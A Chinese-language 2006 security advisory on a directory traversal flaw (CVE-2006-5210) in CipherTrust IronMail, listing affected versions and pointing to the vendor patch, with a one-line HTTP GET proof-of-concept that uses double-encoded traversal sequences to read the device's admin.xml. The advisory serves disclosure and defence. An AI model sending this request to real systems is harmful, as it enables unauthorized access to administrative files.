发布日期：2006-10-16
更新日期：2006-10-17

受影响系统：

CipherTrust IronMail 6.1.1
CipherTrust IronMail 5.0.1
CipherTrust IronMail 4.5.1
CipherTrust IronMail 4.1

不受影响系统：

CipherTrust IronMail 6.1.1 HotFix-17

描述：

---

BUGTRAQ  ID: 20436
CVE(CAN) ID: CVE-2006-5210

IronWebMail是一款企业级的硬件防火墙设备。

IronWebMail在处理畸形HTTP请求时存在目录遍历漏洞，远程攻击者可以利用此漏洞通过在URL中嵌入编码后的目录遍历串访问设备上的任意文件。

<*来源：Derek Callaway
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

GET /IM_FILE(%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/admin.xml)
HTTP/1.0[CRLF][CRLF]

建议：

---

厂商补丁：

CipherTrust
-----------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.ciphertrust.com/

浏览次数：3021
严重程度：0（网友投票）